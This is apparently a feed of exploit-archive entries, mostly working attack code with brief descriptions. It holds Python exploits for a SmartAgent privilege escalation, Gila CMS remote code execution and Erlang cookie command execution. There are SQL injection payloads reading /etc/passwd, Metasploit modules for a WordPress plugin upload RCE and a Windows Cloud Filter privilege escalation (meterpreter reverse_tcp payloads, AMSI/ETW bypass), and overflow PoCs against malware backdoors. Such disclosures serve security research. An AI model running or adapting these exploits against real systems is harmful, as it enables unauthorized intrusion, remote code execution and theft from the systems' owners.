jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.
ff856f45b190724cb5f562e78e919396Backdoor.Win32.Zombam.a malware suffers from a remote stack buffer overflow vulnerability.
1d4c04985317d4a19cc3d4abc3ead48fDiscovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/6c5081e9b65a52963b0b1ae612ef7eb4.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Zombam.a
Vulnerability: Remote Stack Buffer Overflow
Description: The malware listens on TCP port 80, sending an HTTP GET request with 300 or more bytes will trigger buffer overflow overwriting EIP.
Type: PE32
MD5: 6c5081e9b65a52963b0b1ae612ef7eb4
Vuln ID: MVID-2021-0022
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/11/2021
Memory Dump:
0:004> .ecxr
eax=00000000 ebx=03f90350 ecx=852341b4 edx=00000000 esi=047efb55 edi=047efc8b
eip=41414141 esp=047efab8 ebp=047eff80 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
41414141 ?? ???
FAULTING_IP:
+24
41414141 ?? ???
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 41414141
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 41414141
Attempt to read from address 41414141
PROCESS_NAME: Backdoor.Win32.Zombam.a.6c5081e9b65a52963b0b1ae612ef7eb4.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 41414141
READ_ADDRESS: 41414141
FOLLOWUP_IP:
+24
41414141 ?? ???
FAILED_INSTRUCTION_ADDRESS:
+24
41414141 ?? ???
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]
LAST_CONTROL_TRANSFER: from 41414141 to 41414141
FAULTING_THREAD: ffffffff
BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE
PRIMARY_PROBLEM_CLASS: BAD_INSTRUCTION_PTR_STACKIMMUNE
DEFAULT_BUCKET_ID: BAD_INSTRUCTION_PTR_STACKIMMUNE
IP_ON_HEAP: 41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.
IP_IN_FREE_BLOCK: 41414141
FRAME_ONE_INVALID: 1
STACK_TEXT:
00000000 00000000 unknown!backdoor.win32.zombam.a.6c5081e9b65a52963b0b1ae612ef7eb4.exe+0x0
STACK_COMMAND: .cxr 00000000047EF658 ; kb ; ** Pseudo Context ** ; kb
SYMBOL_NAME: unknown!backdoor.win32.zombam.a.6c5081e9b65a52963b0b1ae612ef7eb4.exe
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: unknown
IMAGE_NAME: unknown
DEBUG_FLR_IMAGE_TIMESTAMP: 0
FAILURE_BUCKET_ID: BAD_INSTRUCTION_PTR_STACKIMMUNE_c0000005_unknown!Unloaded
BUCKET_ID: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE_BAD_IP_unknown!backdoor.win32.zombam.a.6c5081e9b65a52963b0b1ae612ef7eb4.exe
Exploit/PoC:
from socket import *
MALWARE_HOST="x.x.x.x"
PORT=80
PACKET="GET /"+"A"*300+"HTTP/1.0\r\nHost: "+MALWARE_HOST
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
s.send(PACKET)
s.close()
print("Backdoor.Win32.Zombam.a / Remote Stack Buffer Overflow")
print("MD5: 6c5081e9b65a52963b0b1ae612ef7eb4")
print("By Malvuln")
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
SmartAgent version 3.1.0 suffers from a privilege escalation vulnerability.
07b8ed0a364728669f5a7d741a5a8c1d# Exploit Title: SmartAgent 3.1.0 - Privilege Escalation
# Date: 01-11-2021
# Exploit Author: Orion Hridoy
# Vendor Homepage: https://www.smartagent.io/
# Version: Build 3.1.0
# Tested on: Windows 10/Kali Linux
A Low grade user like ViewOnly can create an account with SuperUser
permission.
Steps To Reproduce:
1. Create a user with ViewOnly
2. Visit https://demo.localhost.com/#/CampaignManager/users
3. Now you will be able to create an account with SuperUser.
#Python Exploit [Replace With Your Authorization Code]
import requests
session = requests.Session()
rawBody = "{\"username\":\"orion@hridoy.com
\",\"password\":\"Orionhridoy69\",\"appName\":\"AppEngage\",\"role\":\"Admin\",\"android\":\"1\",\"ios\":\"0\",\"kai\":\"0\"}"
headers = {"Authorization":"id=orion@gmail.com,engageToken=eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJvcmlvbkBnbWFpbC5jb20iLCJyb2xlcyI6WyJWaWV3T25seSJdLCJhcHBOYW1lIjoiQXBwRW5nYWdlIiwicGxhdGZvcm0iOiJBTkRST0lEIiwiaXNzIjoiRU5BR0FHRSIsImlhdCI6MTYxMDM3NDEyMCwiZXhwIjoxNjExMjM4MTIwfQ.SbnZaRe3-2GOFOm7QDzvIBQCKBAK_GV-wKsMoH4GGChyjUFe2Ij4LiVl5rXsWRfTqNnJXj9fFxYTzkD2-kXlAQ","Accept":"application/json,
text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64;
rv:52.0) Gecko/20100101
Firefox/52.0","Referer":"https://demo.localhost.com/","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip,
deflate","DNT":"1","Content-Type":"application/json"}
response = session.post("https://demo.localhost.com/api/createUser",
data=rawBody, headers=headers)
print("User Created With\nUser: orion@hridoy.com\nPass: Orionhridoy69")
Cemetery Mapping and Information System version 1.0 suffers from multiple remote SQL injection vulnerabilities.
13b51c2660d3b63bd96411a4b133e165# Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple SQL Injections
# Exploit Author: Mesut Cetin
# Date: 2021-01-12
# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Vulnerable parameter: "Search" bar (POST method)
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0
SQL Injection is a type of an injection attack that makes it possible to execute malicious SQL statements. Due to unsanitized user input, the attacker can retrieve the entire SQL database in this case.
Explanation:
The function "person.php" takes user input through the search bar at line 45:
"$_POST['search']"
and uses it without any sanitization for the following SQL statement (line 46-49):
$sql = "SELECT * FROM tblpeople WHERE FNAME LIKE '%".$search."%'";
$mydb->setQuery($sql);
$cur = $mydb->executeQuery();
$numrows = $mydb->num_rows($cur);//get the number of count
A single quote (') at the search bar under http://localhost/CemeteryMapping/index.php?q=person will result in SQL synthax errors.
Proof of Concept:
Since the php code lacks of sanitization of the user input, multiple SQL injection queries can be found.
1. Boolean-based SQL injection
POST request the page /CemeteryMapping/index.php?q=person and use as payload: ' or 1=1 --
search=' or 1=1 --
2. Union-based SQL injection
To retrieve sensitive files like /etc/passwd, use the following payload at the search bar (POST request http://localhost/CemeteryMapping/index.php?q=person):
search=' UNION SELECT NULL,load_file('/etc/passwd'),NULL,NULL,NULL,NULL,NULL-- -
If you want to enumerate the target system further, replace "load_file('/etc/passwd')" with one of the following MySQL commands:
@@hostname : Current Hostname
@@tmpdir : Temp Directory
@@datadir : Data Directory
@@version : Version of DB
@@basedir : Base Directory
user() : Current User
database() : Current Database
version() : Version
schema() : current Database
UUID() : System UUID key
current_user() : Current User
current_user : Current User
system_user() : Current System user
session_user() : Session user
@@GLOBAL.have_symlink : Check if Symlink is enabled or disabled
@@GLOBAL.have_ssl : Check if it have SSL or not
3. Time-based SQL injection
For time-based SQL injection, use the payload: ' AND (SELECT 2634 FROM (SELECT(SLEEP(5)))muaN)-- -
Mitigation:
By using prepared statements and parameterized queries, the SQL injection can be prevented.
Gila CMS version 2.0.0 suffers from a remote code execution vulnerability.
9f905fd1f22c5584b0c7e5d809cb7793# Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)
# Date: 1.12.2021
# Exploit Author: Enesdex
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/releases/tag/2.0.0
# Version: x < 2.0.0
# Tested on: Windows 10
import requests
import time
target_url = "http://192.168.1.101:80/Gila/"
cmd = "calc.exe"
url = target_url+"?c=admin"
cookies = {"GSESSIONID": "../../index.php"}
headers = {"User-Agent": "<?php shell_exec('"+cmd+"'); include 'src\\core\\bootstrap.php'; ?>"}
requests.get(url, headers=headers, cookies=cookies)
time.sleep(5)
requests.get(target_url+"/index.php")
WordPress AIT CSV Import/Export plugin versions 3.0.3 and below allow unauthenticated remote attackers to upload and execute arbitrary PHP code. The upload-handler does not require authentication, nor validates the uploaded content. It may return an error when attempting to parse a CSV, however the uploaded shell is left. The shell is uploaded to wp-content/uploads/. The plugin is not required to be activated to be exploitable.
c39ac90e0b404ac71d25decc4f495aec##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::Wordpress
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress AIT CSV Import Export Unauthenticated Remote Code Execution',
'Description' => %q{
The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and
execute arbitrary PHP code. The upload-handler does not require authentication, nor validates
the uploaded content. It may return an error when attempting to parse a CSV, however the
uploaded shell is left. The shell is uploaded to wp-content/uploads/. The plugin is not
required to be activated to be exploitable.
},
'License' => MSF_LICENSE,
'Author' =>
[
# 0day according to wpvdb
'h00die', # msf module
],
'References' =>
[
[ 'URL', 'https://www.ait-themes.club/wordpress-plugins/csv-import-export/#changelog-popup' ],
[ 'WPVDB', '10471' ]
],
'Platform' => [ 'php' ],
'Privileged' => false,
'Arch' => ARCH_PHP,
'Targets' =>
[
[
'AIT CSV Import Export <3.0.4',
{
'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
}
]
],
'DisclosureDate' => '2020-11-14', # 0day detected by wpvdb
'DefaultTarget' => 0
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/'])
]
)
end
def check
return CheckCode::Unknown unless wordpress_and_online?
# no readme file, just a changelog so we need the version from there
changelog = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'ait-csv-import-export', 'changelog.txt')
check_version_from_custom_file(changelog, /^v(\d\.\d\.\d),/, '3.0.4')
end
def exploit
filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"
register_file_for_cleanup(filename)
print_status("Uploading payload: #{filename}")
post_data = Rex::MIME::Message.new
post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'ait-csv-import-export', 'admin', 'upload-handler.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
print_status('Triggering payload')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', filename)
)
end
end
This Metasploit module exploits a vulnerability in cldflt.sys. The Cloud Filter driver on Windows 10 v1803 and later, prior to the December 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any security checks that would otherwise prevent a normal user from being able to create files in directories they don't have permissions to create files in. This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" command to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.
a3096153d5abb79b42ddbd4fd922a273##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
include Exploit::EXE
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
include Msf::Post::Windows::Dotnet
include Msf::Post::Windows::Services
include Msf::Post::Windows::FileSystem
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',
'Description' => %q{
The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December
2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when
calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()
function with attacker controlled input. This meant that files were created with
KernelMode permissions, thereby bypassing any security checks that would otherwise
prevent a normal user from being able to create files in directories
they don't have permissions to create files in.
This module abuses this vulnerability to perform a DLL hijacking attack against the
Microsoft Storage Spaces SMP service, which grants the attacker code execution as the
NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one
of the Meterpreter payloads, as doing so will allow them to subsequently escalate their
new session from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" command
to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.
},
'License' => MSF_LICENSE,
'Author' => [
'James Foreshaw', # Vulnerability discovery and PoC creator
'Grant Willcox' # Metasploit module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Privileged' => true,
'Arch' => [ARCH_X64],
'Targets' =>
[
[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => '2020-03-10',
'References' => [
['CVE', '2020-17136'],
['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=2082'],
['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136']
],
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ],
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
}
)
)
register_options(
[
OptBool.new('AMSIBYPASS', [true, 'Enable Amsi bypass', true]),
OptBool.new('ETWBYPASS', [true, 'Enable Etw bypass', true]),
OptInt.new('WAIT', [false, 'Time in seconds to wait', 5])
], self.class
)
register_advanced_options(
[
OptBool.new('KILL', [true, 'Kill the injected process at the end of the task', false])
]
)
end
def check_requirements(clr_req, installed_dotnet_versions)
installed_dotnet_versions.each do |fi|
if clr_req == 'v4.0.30319'
if fi[0] == '4'
vprint_status('Requirements ok')
return true
end
elsif fi[0] == '3'
vprint_status('Requirements ok')
return true
end
end
print_error('Required dotnet version not present')
false
end
def check
sysinfo_value = sysinfo['OS']
if sysinfo_value !~ /windows/i
# Non-Windows systems are definitely not affected.
return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
end
build_num_raw = cmd_exec('cmd.exe /c ver')
build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)
if build_num.nil?
return CheckCode::Unknown("Couldn't retrieve the target's build number!")
else
build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0]
vprint_status("Target's build number: #{build_num}")
end
build_num_gemversion = Gem::Version.new(build_num)
# Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/
if (build_num_gemversion >= Gem::Version.new('10.0.19042.0')) && (build_num_gemversion < Gem::Version.new('10.0.19042.685')) # Windows 10 20H2
return CheckCode::Appears('A vulnerable Windows 10 20H2 build was detected!')
elsif (build_num_gemversion >= Gem::Version.new('10.0.19041.0')) && (build_num_gemversion < Gem::Version.new('10.0.19041.685')) # Windows 10 v2004 aka 20H1
return CheckCode::Appears('A vulnerable Windows 10 20H1 build was detected!')
elsif (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.1256')) # Windows 10 v1909
return CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!')
elsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.1256')) # Windows 10 v1903
return CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!')
elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1637')) # Windows 10 v1809
return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1902')) # Windows 10 v1803
return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
else
return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
end
end
def exploit
if sysinfo['Architecture'] != 'x64'
fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
elsif session.arch != 'x64'
fail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!')
end
dir_junct_path = 'C:\\Windows\\Temp'
intermediate_dir = rand_text_alpha(10).to_s
junction_dir = rand_text_alpha(10).to_s
path_to_intermediate_dir = "#{dir_junct_path}\\#{intermediate_dir}"
mkdir("#{path_to_intermediate_dir}")
if !directory?("#{path_to_intermediate_dir}")
fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
end
register_dir_for_cleanup("#{path_to_intermediate_dir}")
mkdir("#{path_to_intermediate_dir}\\#{junction_dir}")
if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')
end
mount_handle = create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\')
if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')
end
exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'
unless File.file?(exe_path)
fail_with(Failure::BadConfig, 'Assembly not found')
end
installed_dotnet_versions = get_dotnet_versions
vprint_status("Dot Net Versions installed on target: #{installed_dotnet_versions}")
if installed_dotnet_versions == []
fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
end
if check_requirements('v4.0.30319', installed_dotnet_versions) == false
fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
end
payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
write_file(payload_path, generate_payload_dll)
register_file_for_cleanup(payload_path)
execute_assembly(exe_path, "#{path_to_intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
service_start('smphost')
register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
sleep(3)
delete_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", mount_handle)
end
def pid_exists(pid)
mypid = client.sys.process.getpid.to_i
if pid == mypid
print_bad('Cannot select the current process as the injection target')
return false
end
host_processes = client.sys.process.get_processes
if host_processes.empty?
print_bad('No running processes found on the target host.')
return false
end
theprocess = host_processes.find { |x| x['pid'] == pid }
!theprocess.nil?
end
def launch_process
process_name = 'notepad.exe'
print_status("Launching #{process_name} to host CLR...")
process = client.sys.process.execute(process_name, nil, {
'Channelized' => true,
'Hidden' => true,
'UseThreadToken' => true,
'ParentPid' => 0
})
hprocess = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{hprocess.pid} launched.")
[process, hprocess]
end
def inject_hostclr_dll(process)
print_status("Reflectively injecting the Host DLL into #{process.pid}..")
library_path = ::File.join(Msf::Config.data_directory, 'post', 'execute-dotnet-assembly', 'HostingCLRx64.dll')
library_path = ::File.expand_path(library_path)
print_status("Injecting Host into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)
[exploit_mem, offset]
end
def execute_assembly(exe_path, exe_args)
if sysinfo.nil?
fail_with(Failure::BadConfig, 'Session invalid')
else
print_status("Running module against #{sysinfo['Computer']}")
end
if datastore['WAIT'].zero?
print_warning('Output unavailable as wait time is 0')
end
process, hprocess = launch_process
exploit_mem, offset = inject_hostclr_dll(hprocess)
assembly_mem = copy_assembly(exe_path, hprocess, exe_args)
print_status('Executing...')
hprocess.thread.create(exploit_mem + offset, assembly_mem)
if datastore['WAIT'].positive?
sleep(datastore['WAIT'])
read_output(process)
end
if datastore['KILL']
print_good("Killing process #{hprocess.pid}")
client.sys.process.kill(hprocess.pid)
end
print_good('Execution finished.')
end
def copy_assembly(exe_path, process, exe_args)
print_status("Host injected. Copy assembly into #{process.pid}...")
int_param_size = 8
sign_flag_size = 1
amsi_flag_size = 1
etw_flag_size = 1
assembly_size = File.size(exe_path)
cln_params = ''
cln_params << exe_args
cln_params << "\x00"
payload_size = amsi_flag_size + etw_flag_size + sign_flag_size + int_param_size
payload_size += assembly_size + cln_params.length
assembly_mem = process.memory.allocate(payload_size, PAGE_READWRITE)
params = [
assembly_size,
cln_params.length,
datastore['AMSIBYPASS'] ? 1 : 0,
datastore['ETWBYPASS'] ? 1 : 0,
2
].pack('IICCC')
params += cln_params
process.memory.write(assembly_mem, params + File.read(exe_path))
print_status('Assembly copied.')
assembly_mem
end
def read_output(process)
print_status('Start reading output')
old_timeout = client.response_timeout
client.response_timeout = 5
begin
loop do
output = process.channel.read
if !output.nil? && !output.empty?
output.split("\n").each { |x| print_good(x) }
end
break if output.nil? || output.empty?
end
rescue Rex::TimeoutError
vprint_warning('Time out exception: wait limit exceeded (5 sec)')
rescue ::StandardError => e
print_error("Exception: #{e.inspect}")
end
client.response_timeout = old_timeout
print_status('End output.')
end
end
Erlang makes use of a cookie that can be leveraged to achieve remote code execution.
f0614ff7536574d91d20ea97b35c5f74# Exploit Title: Erlang Cookie - Remote Code Execution
# Date: 2020-05-04
# Exploit Author: 1F98D
# Original Author: Milton Valencia (wetw0rk)
# Software Link: https://www.erlang.org/
# Version: N/A
# Tested on: Debian 9.11 (x64)
# References:
# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
#
# Erlang allows distributed Erlang instances to connect and remotely execute commands.
# Nodes are permitted to connect to eachother if they share an authentication cookie,
# this cookie is commonly called ".erlang.cookie"
#
#!/usr/local/bin/python3
import socket
from hashlib import md5
import struct
import sys
TARGET = "192.168.1.1"
PORT = 25672
COOKIE = "XXXXXXXXXXXXXXXXXXXX"
CMD = "whoami"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))
name_msg = b"\x00"
name_msg += b"\x15"
name_msg += b"n"
name_msg += b"\x00\x07"
name_msg += b"\x00\x03\x49\x9c"
name_msg += b"AAAAAA@AAAAAAA"
s.send(name_msg)
s.recv(5) # Receive "ok" message
challenge = s.recv(1024) # Receive "challenge" message
challenge = struct.unpack(">I", challenge[9:13])[0]
print("Extracted challenge: {}".format(challenge))
challenge_reply = b"\x00\x15"
challenge_reply += b"r"
challenge_reply += b"\x01\x02\x03\x04"
challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest()
s.send(challenge_reply)
challenge_res = s.recv(1024)
if len(challenge_res) == 0:
print("Authentication failed, exiting")
sys.exit(1)
print("Authentication successful")
ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex"
msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k'
msg += struct.pack(">H", len(CMD))
msg += bytes(CMD, 'ascii')
msg += b'jw\x04user'
payload = b'\x70' + ctrl + msg
payload = struct.pack('!I', len(payload)) + payload
print("Sending cmd: '{}'".format(CMD))
s.send(payload)
print(s.recv(1024))
Backdoor.Win32.Kurbadur.a malware suffers from a remote stack buffer overflow vulnerability.
d7e25699281dd539a431c9cfb0f980e8Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/821d3d5a9b15dc3388fe17f233cce296.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Kurbadur.a
Vulnerability: Remote Stack Buffer Overflow
Description: The malware listens on TCP port 21220, by sending incrementing HTTP TRACE requests with an increasing payload size, we trigger buffer overflow overwriting EIP.
Upon running a fake error message box will appear, the specimen also trys to connect to SMTP port 25.
Type: PE32
MD5: 821d3d5a9b15dc3388fe17f233cce296
Vuln ID: MVID-2021-2023
Dropped files: Crss.exe
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/12/2021
Memory Dump:
*** WARNING: Unable to verify checksum for Crss.exe
*** ERROR: Module load completed but symbols could not be loaded for Crss.exe
Crss+0x1c5a:
00011c5a 8902 mov dword ptr [edx],eax ds:002b:41414141=????????
0:000> .ecxr
eax=41414141 ebx=04208a38 ecx=41414141 edx=41414141 esi=00000014 edi=000ac614
eip=00011c5a esp=0040143c ebp=000ac618 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
Crss+0x1c5a:
00011c5a 8902 mov dword ptr [edx],eax ds:002b:41414141=????????
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
Failed calling InternetOpenUrl, GLE=12029
FAULTING_IP:
Crss+1c5a
00011c5a 8902 mov dword ptr [edx],eax
EXCEPTION_RECORD: 004feb08 -- (.exr 0x4feb08)
ExceptionAddress: 00011c5a (Crss+0x00001c5a)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 41414141
Attempt to write to address 41414141
PROCESS_NAME: Crss.exe
OVERLAPPED_MODULE: Address regions for 'mswsock' and 'dataexchange.dll' overlap
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 41414141
WRITE_ADDRESS: 41414141
FOLLOWUP_IP:
user32!_InternalCallWinProc+0
764ee090 55 push ebp
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
CONTEXT: 004feb58 -- (.cxr 0x4feb58)
eax=41414141 ebx=04208a38 ecx=41414141 edx=41414141 esi=0000001c edi=000ac614
eip=00011c5a esp=004fefb8 ebp=000ac618 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
Crss+0x1c5a:
00011c5a 8902 mov dword ptr [edx],eax ds:002b:41414141=????????
Resetting default scope
ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]
LAST_CONTROL_TRANSFER: from 000120fe to 00011c5a
FAULTING_THREAD: ffffffff
BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_STACK_OVERFLOW_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141
DEFAULT_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141
STACK_TEXT:
004fefb8 00011c5a crss+0x1c5a
004fefc0 000120fe crss+0x20fe
004fefd4 000122a0 crss+0x22a0
004feffc 00012727 crss+0x2727
004ff0fc 000a786d crss+0x9786d
004ff8c4 0006fc0d crss+0x5fc0d
004ff8d8 0006eb95 crss+0x5eb95
004ff8fc 0006f11c crss+0x5f11c
